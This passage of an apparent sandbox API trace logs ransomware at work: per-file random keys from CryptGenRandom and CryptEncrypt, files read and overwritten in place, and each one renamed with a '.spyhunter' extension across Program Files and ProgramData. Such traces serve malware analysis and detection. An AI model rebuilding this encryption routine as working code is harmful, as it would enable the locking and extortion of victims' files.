Size=0x1003e) returned 0x2ef5c20 [0127.855] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT.spyhunter") returned 61 [0127.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\uct"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\uct.spyhunter")) returned 1 [0127.855] GetProcessHeap () returned 0x2c0000 [0127.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.856] GetProcessHeap () returned 0x2c0000 [0127.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.856] GetProcessHeap () returned 0x2c0000 [0127.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe670 | out: hHeap=0x2c0000) returned 1 [0127.856] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f780 | out: pbBuffer=0x57f780) returned 1 [0127.856] GetProcessHeap () returned 0x2c0000 [0127.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.856] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f778*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f778*=0x30) returned 1 [0127.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.857] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9") returned 53 [0127.857] StrStrW (lpFirst="GMT-9", lpSrch=".txt") returned 0x0 [0127.857] GetProcessHeap () returned 0x2c0000 [0127.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.857] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f73c*=0x1b, lpOverlapped=0x0) returned 1 [0127.858] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.858] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f73c*=0x1b, lpOverlapped=0x0) returned 1 [0127.858] GetProcessHeap () returned 0x2c0000 [0127.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.858] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.858] WriteFile (in: hFile=0xec, lpBuffer=0x57f77c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f73c, lpOverlapped=0x0 | out: lpBuffer=0x57f77c*, lpNumberOfBytesWritten=0x57f73c*=0x4, lpOverlapped=0x0) returned 1 [0127.858] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f73c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f73c*=0x30, lpOverlapped=0x0) returned 1 [0127.858] CloseHandle (hObject=0xec) returned 1 [0127.859] GetProcessHeap () returned 0x2c0000 [0127.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.859] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9.spyhunter") returned 63 [0127.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-9"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-9.spyhunter")) returned 1 [0127.859] GetProcessHeap () returned 0x2c0000 [0127.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.859] GetProcessHeap () returned 0x2c0000 [0127.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.859] GetProcessHeap () returned 0x2c0000 [0127.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0da8 | out: hHeap=0x2c0000) returned 1 [0127.860] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f780 | out: pbBuffer=0x57f780) returned 1 [0127.860] GetProcessHeap () returned 0x2c0000 [0127.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.860] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f778*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f778*=0x30) returned 1 [0127.860] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0128.083] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8") returned 53 [0128.083] StrStrW (lpFirst="GMT-8", lpSrch=".txt") returned 0x0 [0128.084] GetProcessHeap () returned 0x2c0000 [0128.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0128.084] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f73c*=0x1b, lpOverlapped=0x0) returned 1 [0128.084] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.085] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f73c*=0x1b, lpOverlapped=0x0) returned 1 [0128.085] GetProcessHeap () returned 0x2c0000 [0128.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0128.085] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.085] WriteFile (in: hFile=0x170, lpBuffer=0x57f77c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f73c, lpOverlapped=0x0 | out: lpBuffer=0x57f77c*, lpNumberOfBytesWritten=0x57f73c*=0x4, lpOverlapped=0x0) returned 1 [0128.085] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f73c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f73c*=0x30, lpOverlapped=0x0) returned 1 [0128.085] CloseHandle (hObject=0x170) returned 1 [0128.085] GetProcessHeap () returned 0x2c0000 [0128.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0128.085] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8.spyhunter") returned 63 [0128.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-8"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-8.spyhunter")) returned 1 [0128.086] GetProcessHeap () returned 0x2c0000 [0128.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0128.086] GetProcessHeap () returned 0x2c0000 [0128.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0128.086] GetProcessHeap () returned 0x2c0000 [0128.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0cf0 | out: hHeap=0x2c0000) returned 1 [0128.086] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f778 | out: pbBuffer=0x57f778) returned 1 [0128.086] GetProcessHeap () returned 0x2c0000 [0128.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0128.087] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f770*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f770*=0x30) returned 1 [0128.087] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0128.087] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST") returned 47 [0128.087] StrStrW (lpFirst="MST", lpSrch=".txt") returned 0x0 [0128.087] GetProcessHeap () returned 0x2c0000 [0128.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0128.087] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f734, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f734*=0x1b, lpOverlapped=0x0) returned 1 [0128.088] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.088] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57f734, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f734*=0x1b, lpOverlapped=0x0) returned 1 [0128.088] GetProcessHeap () returned 0x2c0000 [0128.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0128.088] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.088] WriteFile (in: hFile=0x170, lpBuffer=0x57f774*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f734, lpOverlapped=0x0 | out: lpBuffer=0x57f774*, lpNumberOfBytesWritten=0x57f734*=0x4, lpOverlapped=0x0) returned 1 [0128.089] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f734, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f734*=0x30, lpOverlapped=0x0) returned 1 [0128.089] CloseHandle (hObject=0x170) returned 1 [0128.089] GetProcessHeap () returned 0x2c0000 [0128.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0128.089] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST.spyhunter") returned 57 [0128.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst.spyhunter")) returned 1 [0128.090] GetProcessHeap () returned 0x2c0000 [0128.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0128.090] GetProcessHeap () returned 0x2c0000 [0128.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0128.090] GetProcessHeap () returned 0x2c0000 [0128.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33db28 | out: hHeap=0x2c0000) returned 1 [0128.090] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f778 | out: pbBuffer=0x57f778) returned 1 [0128.090] GetProcessHeap () returned 0x2c0000 [0128.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0128.090] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f770*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f770*=0x30) returned 1 [0128.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\met"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0128.090] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET") returned 47 [0128.090] StrStrW (lpFirst="MET", lpSrch=".txt") returned 0x0 [0128.091] GetProcessHeap () returned 0x2c0000 [0128.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0128.091] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f734, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f734*=0x4a0, lpOverlapped=0x0) returned 1 [0128.168] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffb60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.168] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x57f734, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f734*=0x4a0, lpOverlapped=0x0) returned 1 [0128.312] GetProcessHeap () returned 0x2c0000 [0128.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0128.312] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.312] WriteFile (in: hFile=0x170, lpBuffer=0x57f774*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f734, lpOverlapped=0x0 | out: lpBuffer=0x57f774*, lpNumberOfBytesWritten=0x57f734*=0x4, lpOverlapped=0x0) returned 1 [0128.312] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f734, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f734*=0x30, lpOverlapped=0x0) returned 1 [0128.313] CloseHandle (hObject=0x170) returned 1 [0128.313] GetProcessHeap () returned 0x2c0000 [0128.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0128.313] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET.spyhunter") returned 57 [0128.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\met"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\met.spyhunter")) returned 1 [0128.313] GetProcessHeap () returned 0x2c0000 [0128.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0128.313] GetProcessHeap () returned 0x2c0000 [0128.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0128.313] GetProcessHeap () returned 0x2c0000 [0128.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33da80 | out: hHeap=0x2c0000) returned 1 [0128.313] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f770 | out: pbBuffer=0x57f770) returned 1 [0128.313] GetProcessHeap () returned 0x2c0000 [0128.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0128.314] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f768*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f768*=0x30) returned 1 [0128.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewdwg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0128.780] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL") returned 65 [0128.780] StrStrW (lpFirst="VVIEWDWG.DLL", lpSrch=".txt") returned 0x0 [0128.780] GetProcessHeap () returned 0x2c0000 [0128.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0128.780] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f72c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f72c*=0x2800, lpOverlapped=0x0) returned 1 [0128.893] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.893] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f72c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f72c*=0x2800, lpOverlapped=0x0) returned 1 [0128.893] GetProcessHeap () returned 0x2c0000 [0128.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0128.893] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.893] WriteFile (in: hFile=0x170, lpBuffer=0x57f76c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f72c, lpOverlapped=0x0 | out: lpBuffer=0x57f76c*, lpNumberOfBytesWritten=0x57f72c*=0x4, lpOverlapped=0x0) returned 1 [0128.910] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f72c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f72c*=0x30, lpOverlapped=0x0) returned 1 [0128.910] CloseHandle (hObject=0x170) returned 1 [0128.918] GetProcessHeap () returned 0x2c0000 [0128.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0128.918] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL.spyhunter") returned 75 [0128.918] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewdwg.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewdwg.dll.spyhunter")) returned 1 [0128.919] GetProcessHeap () returned 0x2c0000 [0128.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0128.919] GetProcessHeap () returned 0x2c0000 [0128.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0128.919] GetProcessHeap () returned 0x2c0000 [0128.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06258 | out: hHeap=0x2c0000) returned 1 [0128.919] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f770 | out: pbBuffer=0x57f770) returned 1 [0128.919] GetProcessHeap () returned 0x2c0000 [0128.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0128.919] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f768*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f768*=0x30) returned 1 [0128.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0128.953] GetProcessHeap () returned 0x2c0000 [0128.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0128.953] GetProcessHeap () returned 0x2c0000 [0128.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2a98 | out: hHeap=0x2c0000) returned 1 [0128.966] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f768 | out: pbBuffer=0x57f768) returned 1 [0128.966] GetProcessHeap () returned 0x2c0000 [0128.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0128.966] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f760*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f760*=0x30) returned 1 [0128.967] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0128.967] GetProcessHeap () returned 0x2c0000 [0128.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0128.967] GetProcessHeap () returned 0x2c0000 [0128.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a858 | out: hHeap=0x2c0000) returned 1 [0128.978] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f760 | out: pbBuffer=0x57f760) returned 1 [0128.978] GetProcessHeap () returned 0x2c0000 [0128.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0128.978] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f758*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f758*=0x30) returned 1 [0128.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.003] GetProcessHeap () returned 0x2c0000 [0129.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0129.003] GetProcessHeap () returned 0x2c0000 [0129.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c468 | out: hHeap=0x2c0000) returned 1 [0129.006] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f748 | out: pbBuffer=0x57f748) returned 1 [0129.007] GetProcessHeap () returned 0x2c0000 [0129.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0129.007] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f740*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f740*=0x30) returned 1 [0129.007] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.007] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned 77 [0129.007] StrStrW (lpFirst="directories.acrodata", lpSrch=".txt") returned 0x0 [0129.007] GetProcessHeap () returned 0x2c0000 [0129.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.007] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f704, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f704*=0x1df, lpOverlapped=0x0) returned 1 [0129.008] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffe21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 